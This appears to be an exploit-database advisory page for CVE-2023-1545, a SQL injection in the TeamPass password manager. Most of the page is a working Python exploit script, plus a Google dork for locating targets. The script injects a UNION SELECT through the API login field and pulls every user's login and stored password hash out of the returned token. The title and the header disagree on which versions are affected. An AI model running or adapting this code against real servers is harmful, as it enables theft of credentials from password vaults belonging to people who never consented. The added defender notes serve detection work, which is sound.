
TeamPass 3.0.0.21 SQL Injection

24 Mar 2025 00:00:00 · Reported by Max Meyer · Type: packetstorm · Source: packetstorm.news

TeamPass 3.0.0.21 has an SQL injection vulnerability (CVE-2023-1545) in the API authorization endpoint; the exploit header below lists the affected versions as 2.1.24 and prior.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| GithubExploit | Exploit for SQL Injection in Teampass | 24 Feb 2025 18:01 | githubexploit |
| GithubExploit | Exploit for SQL Injection in Teampass | 22 Sep 2025 00:50 | githubexploit |
| GithubExploit | Exploit for SQL Injection in Teampass | 25 Apr 2025 18:43 | githubexploit |
| Huntr | SQL injection in API authorization check | 15 Jan 2023 14:09 | huntr |
| Circl | CVE-2023-1545 | 21 Mar 2023 13:34 | circl |
| CNNVD | TeamPass SQL注入漏洞 | 21 Mar 2023 00:00 | cnnvd |
| CVE | CVE-2023-1545 | 21 Mar 2023 00:00 | cve |
| Cvelist | CVE-2023-1545 SQL Injection in nilsteampassnet/teampass | 21 Mar 2023 00:00 | cvelist |
| Exploit DB | TeamPass 3.0.0.21 - SQL Injection | 22 Mar 2025 00:00 | exploitdb |
| Github Security Blog | Teampass SQL Injection vulnerability | 21 Mar 2023 12:30 | github |
# Exploit Title: TeamPass SQL Injection
    # Google Dork: intitle:"Teampass" + inurl:index.php?page=items
    # Date: 02/23/2025
    # Exploit Author: Max Meyer - Rivendell
    # Vendor Homepage: http://www.teampass.net
    # Software Link: https://github.com/nilsteampassnet/TeamPass
    # Version: 2.1.24 and prior
    # Tested on: Windows/Linux
    # CVE : CVE-2023-1545
    
    
    #!/usr/bin/env python3
    import sys
    import json
    import base64
    import logging
    import requests
    from typing import Optional, Dict, Any
    from dataclasses import dataclass
    
    # Logging configuration: timestamped, INFO-level records via the root logger.
    logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)
    logger = logging.getLogger(__name__)
    
    @dataclass
    class TeamPassExploit:
        """Proof-of-concept client for CVE-2023-1545 (SQL injection in TeamPass).

        Every request goes to ``<base_url>/api/index.php/authorize``. The
        ``login`` field of the JSON body carries the injected SQL, and the
        answer is read back from the token the server returns.

        Defender notes:
          * The traffic is a burst of POSTs to the authorize endpoint: one for
            the row count, then two per user row read. A ``login`` value
            containing quotes or ``UNION SELECT`` is the distinguishing mark
            for anything that inspects request bodies (WAF, reverse proxy).
          * The script gives up when the endpoint answers
            "API usage is not allowed", i.e. when the API feature is disabled.
          * NOTE(review): the durable fix is a TeamPass release that patches
            CVE-2023-1545 (login value bound as a query parameter instead of
            concatenated) - confirm the fixed version in the vendor advisory.
        """
        base_url: str
        # Constant bcrypt-format string ('$2y$10$' prefix) that execute_sql places in
        # the injected UNION row. Presumably it is the hash of the fixed password sent
        # in the same request, so the server-side password check passes - TODO confirm.
        arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
        
        def __post_init__(self) -> None:
            """Derive the authorize endpoint URL from ``base_url``."""
            self.vulnerable_url = f"{self.base_url}/api/index.php/authorize"
            
        def check_api_enabled(self) -> bool:
            """Check whether the API is enabled.

            Sends a GET to the authorize URL and looks for the text
            "API usage is not allowed" in the body; the HTTP status code is not
            examined.

            Returns:
                False when that text is present or the request raises
                ``requests.RequestException``; True otherwise.
            """
            try:
                response = requests.get(self.vulnerable_url)
                if "API usage is not allowed" in response.text:
                    logger.error("API feature is not enabled")
                    return False
                return True
            except requests.RequestException as e:
                logger.error(f"Erro ao verificar API: {e}")
                return False
    
        def execute_sql(self, sql_query: str) -> Optional[str]:
            """Run one SQL query through the vulnerability.

            Args:
                sql_query: SQL text interpolated, in parentheses, into the
                    injected UNION row.

            Returns:
                The ``public_key`` claim of the JWT payload in the response, or
                None when the response is not OK, has no usable token, or any
                exception is raised.
            """
            try:
                # The login value closes a string literal and appends a UNION row.
                # NOTE(review): this can only work if the server concatenates the
                # login value into its user lookup - the flaw CVE-2023-1545
                # describes; a parameterized query on the server removes it.
                inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \
                         "personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \
                         "FROM teampass_users WHERE login='admin"
                
                # The password and apikey values are constants in this script, which
                # makes them usable as match strings when reviewing request bodies.
                data = {
                    "login": inject,
                    "password": "h4ck3d",
                    "apikey": "foo"
                }
                
                response = requests.post(
                    self.vulnerable_url,
                    headers={"Content-Type": "application/json"},
                    json=data
                )
                
                if not response.ok:
                    logger.error(f"Erro na requisição: {response.status_code}")
                    return None
                    
                token = response.json().get('token')
                if not token:
                    logger.error("Token não encontrado na resposta")
                    return None
                    
                # Decode the JWT token: take the second dot-separated segment,
                # restore the '=' padding to a multiple of 4 and base64-decode it.
                token_parts = token.split('.')
                if len(token_parts) < 2:
                    logger.error("Token JWT inválido")
                    return None
                    
                payload = base64.b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4))
                # The query result is read from the 'public_key' claim of the payload.
                return json.loads(payload).get('public_key')
                
            except Exception as e:
                logger.error(f"Erro ao executar SQL: {e}")
                return None
    
        def get_user_credentials(self) -> Optional[Dict[str, str]]:
            """Fetch the login and ``pw`` column value of every user.

            Only rows of ``teampass_users`` with a non-empty ``pw`` are read, in
            ascending ``login`` order, using one count query and then two
            queries per row.

            Returns:
                A dict mapping login to the ``pw`` value (rows where either
                query returned nothing are left out), or None when the count
                cannot be read or an exception is raised.

            Defender note: ``pw`` presumably holds the stored password hash -
            confirm against the schema. If this traffic is found in logs, treat
            every account in that table as exposed and rotate its password.
            """
            try:
                # Get the total number of users
                user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
                if not user_count or not user_count.isdigit():
                    logger.error("Não foi possível obter o número de usuários")
                    return None
                    
                user_count = int(user_count)
                logger.info(f"Encontrados {user_count} usuários no sistema")
                
                credentials = {}
                # One row per iteration, selected by offset (LIMIT i,1); both queries
                # use the same ordering so login and pw refer to the same row.
                for i in range(user_count):
                    username = self.execute_sql(
                        f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                    )
                    password = self.execute_sql(
                        f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                    )
                    
                    if username and password:
                        credentials[username] = password
                        logger.info(f"Credenciais obtidas para: {username}")
                    
                return credentials
                
            except Exception as e:
                logger.error(f"Erro ao obter credenciais: {e}")
                return None
    
    def main():
        """Command-line entry point: take the base URL from argv and print the result.

        Exits with status 1 when no base URL is given or when the API check
        fails; otherwise prints one ``login: pw`` line per returned entry.
        """
        cli_args = sys.argv[1:]
        if not cli_args:
            logger.error("Usage: python3 script.py <base-url>")
            sys.exit(1)

        client = TeamPassExploit(cli_args[0])
        api_reachable = client.check_api_enabled()
        if not api_reachable:
            sys.exit(1)

        found = client.get_user_credentials()
        if not found:
            # None (failure) and an empty dict both end the run silently.
            return

        print("\nCredenciais encontradas:")
        for login in found:
            print(f"{login}: {found[login]}")

    # Run only when executed as a script, not when imported.
    if __name__ == "__main__":
        main()


24 Mar 2025 00:00 (current)
Vulners AI Score: 8.5 (High risk)
CVSS 3: 7.5
EPSS: 0.13984